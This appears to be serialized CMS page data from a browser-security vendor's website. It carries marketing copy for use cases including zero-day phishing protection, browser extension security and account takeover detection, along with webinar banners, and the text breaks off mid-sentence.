[{"data":1,"prerenderedAt":15208},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":95,"use-case-page":154,"events-pages-/events/sector-2026":1174,"latestResourcesBlogPosts":1239,"/events/sector-2026-form":14250},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8,59,76],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"query":14,"data":15,"variations":49,"lastUpdated":50,"firstPublished":51,"testRatio":42,"createdBy":52,"lastUpdatedBy":53,"folders":54,"meta":55,"rev":58},1742213002749,"efff2a27faf4408e9f908eba4b5542fe","Testimonial - Inductive - Resource - State of Browser Attacks Series","1c6207a5f24948ab82d4a0b17f251193","published",[],{"description":16,"testimonialLink":17,"title":18,"testimonial":19,"type":22,"image":45,"link":46},"Join the industry's top security minds as they break down the browser attack landscape.","/customer-stories/inductive-automation","State of Browser Attacks Series",{"@type":20,"id":21,"model":22,"value":23},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":24,"folders":25,"createdDate":26,"id":21,"name":27,"modelId":28,"published":13,"meta":29,"data":35,"variations":39,"lastUpdated":40,"firstPublished":41,"testRatio":42,"createdBy":43,"lastUpdatedBy":43,"rev":44},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"kind":30,"lastPreviewUrl":31,"breakpoints":32},"data","",{"small":33,"medium":34},640,768,{"author":36,"jobTitle":37,"quote":27,"image":38},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,1,"ST0tXQM8slWpFrmioqKHmENB2qe2","jxysw5jmdok","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe94fca10aa7b46ac8052b7ea22de54cd",{"url":47,"text":48},"https://pushsecurity.com/webinar/state-of-browser-security","Save Your Spot",{},1775235712324,1742221533648,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","ax7YYfD0OCeqT1Vxxv1G4FUbqVr1",[],{"kind":30,"breakpoints":56,"lastPreviewUrl":31,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},320,"h0jxrpelqyl",{"createdDate":60,"id":61,"name":62,"modelId":12,"published":13,"query":63,"data":64,"variations":69,"lastUpdated":70,"firstPublished":71,"testRatio":42,"createdBy":52,"lastUpdatedBy":72,"folders":73,"meta":74,"rev":58},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner",[],{"type":65,"url":66,"text":67,"link":68},"web-banner","https://pushsecurity.com/resources/browser-attacks-report","Get our latest report analyzing browser attack techniques in 2026",{},{},1774258294825,1742208637545,"jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],{"kind":30,"lastPreviewUrl":31,"breakpoints":75,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},{"createdDate":77,"id":78,"name":79,"modelId":12,"published":13,"query":80,"data":81,"variations":89,"lastUpdated":90,"firstPublished":91,"testRatio":42,"createdBy":52,"lastUpdatedBy":72,"folders":92,"meta":93,"rev":58},1742208469288,"6763051b201f44a0838c6400c580ca67","Resource highlight",[],{"type":82,"title":83,"link":84,"description":87,"image":88},"resource","Report: 2026 Browser Attack Techniques",{"text":85,"url":86},"Download now","/resources/browser-attacks-report","Learn about the latest techniques being used in the wild.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{},1772632591818,1742208570400,[],{"lastPreviewUrl":31,"kind":30,"breakpoints":94,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},{"createdDate":96,"id":97,"name":98,"modelId":99,"published":13,"query":100,"data":101,"variations":145,"lastUpdated":146,"firstPublished":147,"testRatio":42,"createdBy":43,"lastUpdatedBy":53,"folders":148,"meta":149,"rev":153},1774965361051,"fd266d0172cc47429be7ad10f48c99ad","always visible banner","0678d178ec8b41efb8a23c09dba7874d",[],{"ctaText":102,"text":103,"url":31,"blocks":104,"state":141},"ewrererw","testrfesssssssssss",[105,129],{"@type":106,"@version":107,"id":108,"component":109,"responsiveStyles":119},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":110,"tag":110,"options":111,"isRSC":118},"TopBannerContent",{"text":112,"ctaText":48,"url":47,"mainText":113,"cta":116},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks",{"content":114,"fontSize":115},"\u003Cp>New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks\u003C/p>","text-base",{"content":117,"fontSize":115,"url":47},"\u003Cp>\u003Cstrong style=\"font-weight:700;\">Save Your Spot\u003C/strong>\u003C/p>\n",null,{"large":120},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"marginTop":126,"marginBottom":126,"fontSize":127,"fontWeight":128},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":130,"@type":106,"tagName":131,"properties":132,"responsiveStyles":136},"builder-pixel-iatci5fl4tg","img",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":137},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},"block","hidden","none",{"deviceSize":142,"location":143},"large",{"path":31,"query":144},{},{},1775137295127,1774968080803,[],{"breakpoints":150,"hasLinks":6,"kind":151,"lastPreviewUrl":152,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},"component","https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","qusj1ngf9ys",[155,340,459,577,695,815,935,1055],{"createdDate":156,"id":157,"name":158,"modelId":159,"published":13,"query":160,"data":166,"variations":328,"lastUpdated":329,"firstPublished":330,"testRatio":42,"screenshot":331,"createdBy":43,"lastUpdatedBy":332,"folders":333,"meta":334,"rev":339},1744829487099,"387451215c314dd5bd654668cdc1a197","Zero-day phishing","cca4143377554c5a9163cc203a8ed2ba",[161],{"@type":162,"property":163,"operator":164,"value":165},"@builder.io/core:Query","urlPath","is","/uc/zero-day-phishing-protection",{"seoDescription":167,"inputs":168,"jsCode":31,"title":169,"seoTitle":169,"customFonts":170,"fontAwesomeIcon":218,"tsCode":31,"blocks":219,"url":165,"state":325},"Detect phishing TTPs directly in the browser and stop credential theft.",[],"Zero-day phishing protection",[171],{"version":172,"lastModified":173,"kind":174,"subsets":175,"family":178,"variants":179,"menu":197,"category":198,"files":199},"v14","2023-07-13","webfonts#webfont",[176,177],"latin","latin-ext","DM Sans",[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],"100","200","300","regular","500","600","800","900","100italic","200italic","300italic","italic","500italic","600italic","700italic","800italic","900italic","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxRT23z.ttf","sans-serif",{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"900italic":208,"500italic":209,"regular":210,"100italic":211,"200italic":212,"700italic":213,"300italic":214,"800italic":215,"italic":216,"600italic":217},"https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAop1hTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwA_JxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAkJxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAfJthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwARZthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAC5thTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8gCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-7DW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDG3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9uCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat_XDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9XCm3zRmYJpso5.ttf","faFishingRod",[220,320],{"@type":106,"@version":107,"tagName":221,"id":222,"children":223},"div","builder-76c6b8d1499346c7bc1fd56ae4e93638",[224,241,250,257,269,284,295,306,312],{"@type":106,"@version":107,"layerName":225,"id":226,"component":227,"responsiveStyles":238},"UseCaseHero","builder-5228fe062bef4a40a91e43f1112832fa",{"name":225,"options":228,"isRSC":118},{"title":169,"description":229,"points":230,"video":237},"\u003Cp>Push detects phishing, session hijacking, malicious copy/paste, and malicious integrations as they happen, using browser-native telemetry to stop threats before they escalate. From cloned login pages to custom toolkits, Push sees what traditional filters miss, and gives defenders the tools to respond fast.\u003C/p>",[231,233,235],{"item":232},"Detect phishing that bypasses traditional filters, including AiTM, SSO password theft, and fake login pages",{"item":234},"Stop never-before-seen attacks with behavioral and on-page analysis inside the browser",{"item":236},"Investigate faster with unified browser, user, and page context","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F40433ceeb4f94b43a82e039a0f4fd411%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=40433ceeb4f94b43a82e039a0f4fd411&alt=media&optimized=true",{"large":239},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},"transparent",{"@type":106,"@version":107,"id":242,"component":243,"responsiveStyles":247},"builder-96634044407e491299e291ed64669e39",{"name":244,"options":245,"isRSC":118},"TrustedBy",{"AllPartners":246,"backgroundTransparent":6},true,{"large":248},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},"#000",{"@type":106,"@version":107,"id":251,"component":252,"responsiveStyles":255},"builder-2c3768f930534557bb8978e32b6a6a0f",{"name":253,"options":254,"isRSC":118},"Diagonal",{"darkMode":246},{"large":256},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":258,"id":259,"component":260,"responsiveStyles":267},"TextImageBlockVertical","builder-7c3c1c2840424db2ad2ccbfaf382dd64",{"name":258,"tag":258,"options":261,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":264,"description":265,"animatedTitle":31,"image":266,"reverse":6,"descriptionPaddingHorizontal":118},1200,800,"\u003Ch2>Why stop at the inbox?\u003C/h2>","\u003Cp>Phishing attacks have evolved. Whether attackers lure users with QR codes, instant messages, or OAuth consent screens, the outcome is the same: it plays out in the browser. Push gives you real-time detection for in-browser threats, stopping phishing and consent-based attacks before they lead to compromise\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7fdcac241f0e4a049166d7076858adeb",{"large":268},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":270,"component":271,"responsiveStyles":279},"builder-41c978b3669749cf947e622b4e79e4d7",{"name":272,"options":273,"isRSC":118},"TextImageBlockHorizontal",{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":276,"description":277,"reverse":246,"image":278},600,100,"\u003Cp>Detect phishing at the edge\u003C/p>","\u003Cp>Push uses industry-first telemetry to detect phishing based on behavior, not static indicators. By analyzing how phishing pages behave and how users interact with them, Push uncovers fake logins, credential theft, and phishing kits the moment they load in the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F9df3d180c97b4e61af142af2ccd68721",{"large":280},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":282,"marginTop":283},"DM Sans, sans-serif","20px","0px",{"@type":106,"@version":107,"id":285,"component":286,"responsiveStyles":292},"builder-d2a7bc941feb43cdb898bc116b203cf9",{"name":272,"options":287,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":289,"description":290,"reverse":6,"image":291},120,"\u003Ch2>Go beyond blocklists and IOCs\u003C/h2>","\u003Cp>Push goes beyond URLs and easy-to-change indicators. It reads the full phishing playbook like script behavior, session hijacks, DOM changes, user inputs, then connects the dots in real time. This gives your team a complete picture of how the phishing attempt worked, not just an alert.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fabfd58db169b433e96d3f1261797156e",{"large":293},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},"36px",{"@type":106,"@version":107,"layerName":272,"id":296,"component":297,"responsiveStyles":303},"builder-42c32198083f4880acb37c5cb76934da",{"name":272,"options":298,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":300,"description":301,"reverse":246,"image":302},140,"\u003Ch2>Enhance your phishing response\u003C/h2>","\u003Cp>When phishing enters your environment, speed matters. Push gives you instant access to the telemetry that counts like session data, user behavior, and page activity, so you can investigate fast, trigger in-browser prompts, or forward alerts to your SIEM or SOAR for response. All in real time, right from the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbb195aec46904056b85e8688629e558e",{"large":304},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},"47px",{"@type":106,"@version":107,"id":307,"component":308,"responsiveStyles":310},"builder-9a95b9cbc4854421a92ef7b90f6c7adb",{"name":253,"options":309,"isRSC":118},{"darkMode":6},{"large":311},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":313,"component":314,"responsiveStyles":318},"builder-0afa17a9f25c4661a90f314d5578aa18",{"name":315,"tag":315,"options":316,"isRSC":118},"LatestResources",{"sectionHeading":31,"customClass":317},"bg-black",{"large":319},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":321,"@type":106,"tagName":131,"properties":322,"responsiveStyles":323},"builder-pixel-pu9f1z4fxj",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":324},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":326},{"path":31,"query":327},{},{},1770892739171,1745499158657,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F69dffdb7f2b14fe6b2e160d0e7f8f83a","SfUPqW5tkibIPby49keNFMdHFTr1",[],{"lastPreviewUrl":335,"breakpoints":336,"kind":337,"hasLinks":6,"winningTest":118,"originalContentId":338,"hasAutosaves":6},"https://pushsecurity.com/uc/zero-day-phishing-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=387451215c314dd5bd654668cdc1a197&builder.overrides.387451215c314dd5bd654668cdc1a197=387451215c314dd5bd654668cdc1a197&builder.overrides.use-case-page:/uc/zero-day-phishing-protection=387451215c314dd5bd654668cdc1a197&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},"page","2daa5670b8504fc7ba4700633e8bd921","z99icwz89i",{"createdDate":341,"id":342,"name":343,"modelId":159,"published":13,"query":344,"data":347,"variations":451,"lastUpdated":452,"firstPublished":453,"testRatio":42,"screenshot":454,"createdBy":43,"lastUpdatedBy":332,"folders":455,"meta":456,"rev":339},1756833377777,"54f8256648f54d439303734b1e69221b","Browser extension security",[345],{"@type":162,"property":163,"operator":164,"value":346},"/uc/browser-extension-security",{"seoTitle":343,"jsCode":31,"title":343,"seoDescription":348,"customFonts":349,"fontAwesomeIcon":354,"inputs":355,"tsCode":31,"blocks":356,"url":346,"state":448},"Shine a light on risky browser extensions.",[350],{"variants":351,"category":198,"kind":174,"lastModified":173,"version":172,"menu":197,"family":178,"files":352,"subsets":353},[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"700italic":213,"800italic":215,"100italic":211,"regular":210,"200italic":212,"500italic":209,"600italic":217,"300italic":214,"900italic":208,"italic":216},[176,177],"faPuzzlePiece",[],[357,443],{"@type":106,"@version":107,"tagName":221,"id":358,"meta":359,"children":360},"builder-71d0648c1d2f4ede8d0d0b5b28b7b94c",{"previousId":222},[361,377,384,391,400,410,420,430,437],{"@type":106,"@version":107,"id":362,"meta":363,"component":364,"responsiveStyles":375},"builder-ff325b4b8fad4edea53f38865947e854",{"previousId":226},{"name":225,"options":365,"isRSC":118},{"title":343,"description":366,"points":367,"video":374},"\u003Cp>Browser extensions introduce new code, new permissions, and new potential for risk. Most go completely unnoticed. Push gives you full visibility into every extension used across your workforce, across major browsers, so you can uncover shadow IT, assess risky permissions, and block unsafe tools before they lead to compromise.\u003C/p>",[368,370,372],{"item":369},"Discover every browser extension in use",{"item":371},"Spot risky or unsanctioned behavior",{"item":373},"Make informed decisions on extension policy","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc538aad95d7f403aa3c3551af72f67c0?alt=media&token=1411fa6d-2eac-4e6c-94bf-ea117da12d67&apiKey=f3a1111ff5be48cdbb123cd9f5795a05",{"large":376},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":378,"meta":379,"component":380,"responsiveStyles":382},"builder-fb89d128c64e47cf9cbb11d90fc24523",{"previousId":242},{"name":244,"options":381,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":383},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":385,"meta":386,"component":387,"responsiveStyles":389},"builder-54388d35126c4d0096eeebaf8c4448cd",{"previousId":251},{"name":253,"options":388,"isRSC":118},{"darkMode":246},{"large":390},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":258,"id":392,"component":393,"responsiveStyles":398},"builder-3c8fa6785dd6466abf52a2470d66d85a",{"name":258,"tag":258,"options":394,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":395,"description":396,"image":397,"reverse":6},"\u003Ch2>Take control of browser extensions\u003C/h2>","\u003Cp>Attackers are increasingly using malicious browser extensions to gain access to data processed and stored in the browser. And the problem is, most security teams have no visibility into what extensions are being used. Push changes that. With browser-native telemetry, the Push extension continuously inventories browser extensions across your environment, flags the risky ones, and gives you intelligence to act. \u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0a004f16a6874f4c8fdf14344acc9fec",{"large":399},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":401,"meta":402,"component":403,"responsiveStyles":408},"builder-93738f98109a4009affb349afd7bb182",{"previousId":270},{"name":272,"options":404,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":405,"description":406,"reverse":246,"image":407},"\u003Ch2>Discover every extension in use\u003C/h2>","\u003Cp>Push gives you structured, searchable data about every extension in your environment, so you’re not just seeing what’s there, but also understanding how it got there, what it can do, and who it affects. It’s the kind of granular insight that’s nearly impossible to get from traditional tools, and it lays the groundwork for better policy decisions and faster investigations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0e5727ca99474f14b1b7916bf6bbb782",{"large":409},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":282,"marginTop":283},{"@type":106,"@version":107,"id":411,"meta":412,"component":413,"responsiveStyles":418},"builder-83393acb12ee4fdd840839185b51edb4",{"previousId":285},{"name":272,"options":414,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":415,"description":416,"reverse":6,"image":417},"\u003Ch2>Spot risky or malicious extensions\u003C/h2>","\u003Cp>Push highlights extensions with dangerous permissions, broad access, or poor reputations. You can quickly detect sideloaded, manually installed, or development-mode extensions that bypass normal controls. And because Push shows you who’s using them and where, you can respond precisely and effectively.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa104d58c8da34fbb8901f738fb21453b",{"large":419},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":421,"meta":422,"component":423,"responsiveStyles":428},"builder-da98e3de949646d89c53a0d1c2784664",{"previousId":296},{"name":272,"options":424,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":425,"description":426,"reverse":246,"image":427},"\u003Ch2>Accelerate security reviews\u003C/h2>","\u003Cp>Most teams have extension policies, they just don’t have the data to enforce them. Push reveals how each extension entered your environment, whether it was installed manually, sideloaded, or deployed in dev mode. You’ll see which users are running what, and where, so you can surface violations, investigate quickly, and respond with confidence.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F229f355be6f243b180f410d237a75bb3",{"large":429},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":431,"meta":432,"component":433,"responsiveStyles":435},"builder-1a689287d1a1418997d57db578a71105",{"previousId":307},{"name":253,"options":434,"isRSC":118},{"darkMode":6},{"large":436},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":438,"component":439,"responsiveStyles":441},"builder-feb4e75029f84c10b6498ef1f8f79128",{"name":315,"tag":315,"options":440,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":442},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":444,"@type":106,"tagName":131,"properties":445,"responsiveStyles":446},"builder-pixel-qhp5spm8dfn",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":447},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":449},{"path":31,"query":450},{},{},1770892784593,1757000441666,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe2a7508a3c154fc78c88707cfb9b034a",[],{"hasLinks":6,"breakpoints":457,"originalContentId":157,"kind":337,"lastPreviewUrl":458,"winningTest":118,"hasAutosaves":6},{"xsmall":57,"small":33,"medium":34},"https://pushsecurity.com/uc/browser-extension-security?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=54f8256648f54d439303734b1e69221b&builder.overrides.54f8256648f54d439303734b1e69221b=54f8256648f54d439303734b1e69221b&builder.overrides.use-case-page:/uc/browser-extension-security=54f8256648f54d439303734b1e69221b&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":460,"id":461,"name":462,"modelId":159,"published":13,"query":463,"data":466,"variations":569,"lastUpdated":570,"firstPublished":571,"testRatio":42,"screenshot":572,"createdBy":43,"lastUpdatedBy":332,"folders":573,"meta":574,"rev":339},1744923509705,"94bebb7bb99d48629ad157e80cf4d81d","Account takeover detection",[464],{"@type":162,"property":163,"operator":164,"value":465},"/uc/account-takeover-detection",{"title":462,"customFonts":467,"jsCode":31,"seoTitle":462,"seoDescription":472,"fontAwesomeIcon":473,"tsCode":31,"blocks":474,"url":465,"state":566},[468],{"kind":174,"category":198,"variants":469,"menu":197,"files":470,"family":178,"subsets":471,"version":172,"lastModified":173},[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"300italic":214,"500italic":209,"800italic":215,"700italic":213,"italic":216,"900italic":208,"600italic":217,"200italic":212,"regular":210,"100italic":211},[176,177],"Stop ATO with stolen credential and compromised token detection.","faUserSecret",[475,561],{"@type":106,"@version":107,"tagName":221,"id":476,"meta":477,"children":478},"builder-e7913a774cae44c5a23d6081c5c30a52",{"previousId":222},[479,495,502,509,518,528,538,548,555],{"@type":106,"@version":107,"id":480,"meta":481,"component":482,"responsiveStyles":493},"builder-f1f1ab1601bc4c0f8c2a8aafd173675d",{"previousId":226},{"name":225,"options":483,"isRSC":118},{"title":462,"description":484,"points":485,"video":492},"\u003Cp>Attackers don’t need to phish, they just need a password that works. Push monitors for signs of credential-based attacks in real time, directly in the browser, catching account takeover attempts before the damage spreads. From ghost logins to credential stuffing, Push cuts off the paths attackers use to quietly slip in the back door.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[486,488,490],{"item":487},"Identify credential-based ATO as it unfolds",{"item":489},"Surface hijacked sessions and token misuse",{"item":491},"Strengthen authentication where your IdP 